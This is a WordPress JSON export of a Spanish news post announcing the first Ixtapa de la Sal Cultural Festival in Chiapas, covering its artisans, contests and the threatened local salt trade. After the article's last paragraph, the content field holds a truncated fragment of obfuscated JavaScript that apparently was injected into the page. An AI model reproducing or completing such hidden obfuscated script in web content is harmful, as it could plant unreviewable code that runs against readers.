{"id":19036,"date":"2024-11-27T02:02:17","date_gmt":"2024-11-27T02:02:17","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19036"},"modified":"2024-11-27T02:02:18","modified_gmt":"2024-11-27T02:02:18","slug":"presentan-el-1er-festival-cultural-ixtapa-de-la-sal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19036","title":{"rendered":"Presentan el 1er. Festival Cultural Ixtapa de la Sal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"632\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/IMG-20241126-WA0035-1024x632.jpg\" alt=\"\" class=\"wp-image-19037\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/IMG-20241126-WA0035-1024x632.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/IMG-20241126-WA0035-300x185.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/IMG-20241126-WA0035-768x474.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/11\/IMG-20241126-WA0035.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>26 de noviembre del 2024. San Crist\u00f3bal de Las Casas.- Los d\u00edas 7 y 8 de diciembre se llevar\u00e1 a cabo el 1er. Festival Cultural Ixtapa de la Sal, un evento sin precedentes cuyo objetivo principal es promover la identidad cultural y el trabajo de los artesanos de este municipio chiapaneco, quienes durante a\u00f1os han sufrido abandono por parte de las autoridades locales.<\/p>\n\n\n\n<p>El festival contar\u00e1 con la participaci\u00f3n de 33 artesanos provenientes de diversas localidades, quienes exhibir\u00e1n bordados, m\u00e1scaras, talladas y piezas elaboradas en pumpo y toles. Adem\u00e1s, se espera la presencia de m\u00e1s de 250 personas entre organizadores, productores y participantes.<\/p>\n\n\n\n<p>Carlos Sol\u00f3rzano, coordinador cultural del evento, se\u00f1al\u00f3 que uno de los objetivos m\u00e1s importantes es involucrar a las nuevas generaciones en la preservaci\u00f3n de las tradiciones locales. Por su parte, Erick Hern\u00e1ndez Cruz, coordinador de Desarrollo Social de la asociaci\u00f3n organizadora, FRADESO, destac\u00f3 la importancia de fomentar el respeto hacia los artesanos mediante la cultura del no regateo, dando a conocer el esfuerzo y los procesos que hay detr\u00e1s de cada pieza. artesanal.<\/p>\n\n\n\n<p>El festival incluye actividades culturales como concursos de danza, canto y oratoria, en las que participar\u00e1n 10 cantantes y 10 oradores. Todas las actividades se realizar\u00e1n en espacios gratuitos, reforzando el car\u00e1cter inclusivo y sin fines de lucro del evento.<\/p>\n\n\n\n<p>Ixtapa, un municipio con una rica herencia prehisp\u00e1nica zoque, ha sido hist\u00f3ricamente reconocido por su producci\u00f3n de sal natural. Sin embargo, esta tradici\u00f3n se encuentra en peligro: solo dos familias contin\u00faan con este oficio ancestral, sin relevo generacional a la vista. Seg\u00fan investigaciones de la UNICACH, esta situaci\u00f3n amenaza tanto el patrimonio cultural como la subsistencia econ\u00f3mica de las familias involucradas.<\/p>\n\n\n\n<p>El Festival Cultural Ixtapa de la Sal busca dar visibilidad a esta problem\u00e1tica y destacar la riqueza cultural de la regi\u00f3n. Aunque el Ayuntamiento de Ixtapa no participa en la organizaci\u00f3n del evento, los municipios vecinos han mostrado inter\u00e9s y apoyo, subrayando la importancia de esta iniciativa para toda la regi\u00f3n.<\/p>\n\n\n\n<p>Organizado por la Fraternidad para el Desarrollo Social (FRADESO), una asociaci\u00f3n civil fundada en 2010 por ind\u00edgenas tzotziles, este festival representa una respuesta colectiva para rescatar y promover las tradiciones culturales de Ixtapa, as\u00ed como para empoderar a los artesanos que dan vida a esta. riqueza patrimonial.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 26 de noviembre del 2024. San Crist\u00f3bal de Las Casas.- Los d\u00edas 7 y 8 de diciembre se llevar\u00e1 a cabo el 1er. Festival Cultural Ixtapa de la Sal, un evento sin precedentes cuyo objetivo principal es promover la identidad cultural y el trabajo de los artesanos de este municipio chiapaneco, quienes &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19037,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-19036","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19036","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19036"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19036\/revisions"}],"predecessor-version":[{"id":19038,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19036\/revisions\/19038"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19037"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19036"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19036"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19036"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}